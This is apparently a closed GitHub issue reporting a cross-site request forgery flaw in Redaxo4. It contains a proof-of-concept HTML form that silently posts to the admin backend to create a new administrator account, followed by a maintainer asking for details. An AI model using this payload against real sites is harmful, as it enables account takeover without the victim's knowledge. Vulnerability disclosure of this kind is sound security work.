Closed riyir closed 4 years ago
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.98.61/redaxo4-master/redaxo/index.php" method="POST"> <input type="hidden" name="page" value="user" /> <input type="hidden" name="save" value="1" /> <input type="hidden" name="FUNC_ADD" value="1" /> <input type="hidden" name="userlogin" value="bbb" /> <input type="hidden" name="userpsw" value="bbbbbb" /> <input type="hidden" name="username" value="Administrator" /> <input type="hidden" name="userdesc" value="bbbbbb" /> <input type="hidden" name="useradmin" value="1" /> <input type="hidden" name="userstatus" value="1" /> <input type="hidden" name="userperm_sprachen[]" value="0" /> <input type="hidden" name="userperm_be_sprache" value="" /> <input type="hidden" name="userperm_startpage" value="" /> <input type="hidden" name="function" value="添加用户" /> <input type="submit" value="Submit request" /> </form> </body> </html>
thank you for the report.
could you describe a bit further how exactly (using which parameter) the vulnerability materializes?
which Redaxo4 version do you use?